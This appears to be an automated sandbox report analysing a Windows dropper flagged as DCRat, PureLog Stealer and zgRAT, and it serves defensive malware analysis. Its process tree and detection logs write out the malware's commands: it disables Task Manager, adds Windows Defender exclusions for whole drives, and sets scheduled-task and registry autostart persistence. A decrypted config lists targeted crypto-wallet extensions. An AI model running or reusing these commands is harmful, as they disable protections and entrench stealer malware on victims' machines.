

Windows Analysis Report
KzLetzDiM8.exe

Overview

General Information

Sample name: KzLetzDiM8.exe
renamed because original name is a hash value
Original sample name: A554052564261D9D5C7E0CD92514D3A0.exe
Analysis ID: 1582599
MD5: a554052564261d9d5c7e0cd92514d3a0
SHA1: 36187b2e29881e34a3fa51dd32b89c6bddcc68c6
SHA256: 06effa75c48b51ef222da511c8550ff450947fd326389fa7d60613c79760d407
Tags: DCRat, exe, user-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Disable Task Manager (disabletaskmgr)
Disables the Windows task manager (taskmgr)
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Suspicious execution chain found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

  • System is w10x64
  • KzLetzDiM8.exe (PID: 6688 cmdline: "C:\Users\user\Desktop\KzLetzDiM8.exe" MD5: A554052564261D9D5C7E0CD92514D3A0)
    • wscript.exe (PID: 6936 cmdline: "C:\Windows\System32\WScript.exe" "C:\fontdriversavescrt\VC6VnT3ED3x5xNRNDrSFzjvQXKeB6kXLUZIf41P3hi0I8ZK.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7160 cmdline: C:\Windows\system32\cmd.exe /c ""C:\fontdriversavescrt\EgkshvK6qarKZkry.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 6864 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • ComComponentDriverInto.exe (PID: 6892 cmdline: "C:\fontdriversavescrt/ComComponentDriverInto.exe" MD5: 715951FB52F5F8D7603E8E2B1DB98A4D)
          • csc.exe (PID: 3104 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 2124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 2840 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC076.tmp" "c:\Windows\System32\CSC2AA1D359FACC4CB2A858F49C46B13997.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • schtasks.exe (PID: 5592 cmdline: schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\Default User\Documents\sihost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • powershell.exe (PID: 5004 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 3796 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 1344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 3288 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 3052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 4476 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 3320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5772 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/fontdriversavescrt/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 2104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 1596 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 1544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 4464 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 1076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5956 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 1448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5592 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 3060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2756 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 3248 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • powershell.exe (PID: 5936 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 1144 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 2124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5000 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5824 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontdriversavescrt\WmiPrvSE.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7252 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7272 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Documents\sihost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7292 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7320 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7336 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontdriversavescrt\ComComponentDriverInto.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8068 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\h43HaGdPC8.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 8736 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 9060 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • ComComponentDriverInto.exe (PID: 8576 cmdline: "C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe" MD5: 715951FB52F5F8D7603E8E2B1DB98A4D)
  • ComComponentDriverInto.exe (PID: 5904 cmdline: "C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe" MD5: 715951FB52F5F8D7603E8E2B1DB98A4D)
  • ComComponentDriverInto.exe (PID: 6472 cmdline: "C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe" MD5: 715951FB52F5F8D7603E8E2B1DB98A4D)
  • sihost.exe (PID: 8476 cmdline: "C:\Users\Default User\Documents\sihost.exe" MD5: 715951FB52F5F8D7603E8E2B1DB98A4D)
  • sihost.exe (PID: 8500 cmdline: "C:\Users\Default User\Documents\sihost.exe" MD5: 715951FB52F5F8D7603E8E2B1DB98A4D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\Default\Documents\sihost.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
C:\Users\Default\Documents\sihost.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\fontdriversavescrt\ComComponentDriverInto.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
C:\fontdriversavescrt\ComComponentDriverInto.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
Source | Rule | Description | Author | Strings
00000000.00000003.1655967326.00000000069EB000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000008.00000000.1944436604.0000000000492000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000008.00000002.2200435861.000000001299D000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
Process Memory Space: ComComponentDriverInto.exe PID: 6892 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
Source | Rule | Description | Author | Strings
8.0.ComComponentDriverInto.exe.490000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
8.0.ComComponentDriverInto.exe.490000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Users\Default User\Documents\sihost.exe", CommandLine: "C:\Users\Default User\Documents\sihost.exe", CommandLine|base64offset|contains: , Image: C:\Users\Default\Documents\sihost.exe, NewProcessName: C:\Users\Default\Documents\sihost.exe, OriginalFileName: C:\Users\Default\Documents\sihost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: "C:\Users\Default User\Documents\sihost.exe", ProcessId: 8476, ProcessName: sihost.exe
Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\fontdriversavescrt\ComComponentDriverInto.exe, ProcessId: 6892, TargetFilename: C:\Users\Default User\Documents\sihost.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\fontdriversavescrt/ComComponentDriverInto.exe", ParentImage: C:\fontdriversavescrt\ComComponentDriverInto.exe, ParentProcessId: 6892, ParentProcessName: ComComponentDriverInto.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 5004, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali | Data: Command: "C:\Users\Default User\Documents\sihost.exe", CommandLine: "C:\Users\Default User\Documents\sihost.exe", CommandLine|base64offset|contains: , Image: C:\Users\Default\Documents\sihost.exe, NewProcessName: C:\Users\Default\Documents\sihost.exe, OriginalFileName: C:\Users\Default\Documents\sihost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: "C:\Users\Default User\Documents\sihost.exe", ProcessId: 8476, ProcessName: sihost.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\fontdriversavescrt\WmiPrvSE.exe", EventID: 13, EventType: SetValue, Image: C:\fontdriversavescrt\ComComponentDriverInto.exe, ProcessId: 6892, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: explorer.exe, "C:\fontdriversavescrt\WmiPrvSE.exe", EventID: 13, EventType: SetValue, Image: C:\fontdriversavescrt\ComComponentDriverInto.exe, ProcessId: 6892, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\fontdriversavescrt/ComComponentDriverInto.exe", ParentImage: C:\fontdriversavescrt\ComComponentDriverInto.exe, ParentProcessId: 6892, ParentProcessName: ComComponentDriverInto.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.cmdline", ProcessId: 3104, ProcessName: csc.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\fontdriversavescrt/ComComponentDriverInto.exe", ParentImage: C:\fontdriversavescrt\ComComponentDriverInto.exe, ParentProcessId: 6892, ParentProcessName: ComComponentDriverInto.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 5004, ProcessName: powershell.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\fontdriversavescrt\VC6VnT3ED3x5xNRNDrSFzjvQXKeB6kXLUZIf41P3hi0I8ZK.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\fontdriversavescrt\VC6VnT3ED3x5xNRNDrSFzjvQXKeB6kXLUZIf41P3hi0I8ZK.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\KzLetzDiM8.exe", ParentImage: C:\Users\user\Desktop\KzLetzDiM8.exe, ParentProcessId: 6688, ParentProcessName: KzLetzDiM8.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\fontdriversavescrt\VC6VnT3ED3x5xNRNDrSFzjvQXKeB6kXLUZIf41P3hi0I8ZK.vbe" , ProcessId: 6936, ProcessName: wscript.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\fontdriversavescrt\ComComponentDriverInto.exe, ProcessId: 6892, TargetFilename: C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.cmdline
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\fontdriversavescrt/ComComponentDriverInto.exe", ParentImage: C:\fontdriversavescrt\ComComponentDriverInto.exe, ParentProcessId: 6892, ParentProcessName: ComComponentDriverInto.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 5004, ProcessName: powershell.exe

Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\fontdriversavescrt/ComComponentDriverInto.exe", ParentImage: C:\fontdriversavescrt\ComComponentDriverInto.exe, ParentProcessId: 6892, ParentProcessName: ComComponentDriverInto.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.cmdline", ProcessId: 3104, ProcessName: csc.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-31T02:23:09.273748+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49804 | 37.44.238.250 | 80 | TCP



AV Detection

Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\Default\Documents\sihost.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe | ReversingLabs: Detection: 78%
Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe | Virustotal: Detection: 60%
Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe | ReversingLabs: Detection: 78%
Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe | Virustotal: Detection: 60%
Source: C:\Users\Default\Documents\sihost.exe | ReversingLabs: Detection: 78%
Source: C:\Users\Default\Documents\sihost.exe | Virustotal: Detection: 60%
Source: C:\Users\user\Desktop\AdxdALuR.log | ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\AdxdALuR.log | Virustotal: Detection: 30%
Source: C:\Users\user\Desktop\IGGSkEKz.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\IGGSkEKz.log | Virustotal: Detection: 40%
Source: C:\Users\user\Desktop\gLKxhGkC.log | Virustotal: Detection: 10%
Source: C:\Users\user\Desktop\izOFSTgA.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\izOFSTgA.log | Virustotal: Detection: 34%
Source: C:\Users\user\Desktop\jwqNoTvv.log | ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\jwqNoTvv.log | Virustotal: Detection: 69%
Source: C:\Users\user\Desktop\ppTmQzAj.log | ReversingLabs: Detection: 37%
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | ReversingLabs: Detection: 78%
Source: C:\fontdriversavescrt\WmiPrvSE.exe | ReversingLabs: Detection: 78%
Source: KzLetzDiM8.exe | Virustotal: Detection: 51%
Source: KzLetzDiM8.exe | ReversingLabs: Detection: 65%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.7% probability
Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe | Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe | Joe Sandbox ML: detected
Source: C:\Users\Default\Documents\sihost.exe | Joe Sandbox ML: detected
Source: KzLetzDiM8.exe | Joe Sandbox ML: detected
Source: 00000008.00000002.2200435861.000000001299D000.00000004.00000800.00020000.00000000.sdmp | String decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"},"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"System drive"}}
Source: 00000008.00000002.2200435861.000000001299D000.00000004.00000800.00020000.00000000.sdmp | String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-LbnYnrAFsRBRgFiNODVy","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
Source: KzLetzDiM8.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Directory created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Directory created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\86b7f9ef8ac2e1
Source: KzLetzDiM8.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb | source: KzLetzDiM8.exe
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.pdb | source: ComComponentDriverInto.exe, 00000008.00000002.2014307419.000000000301B000.00000004.00000800.00020000.00000000.sdmp

Spreading

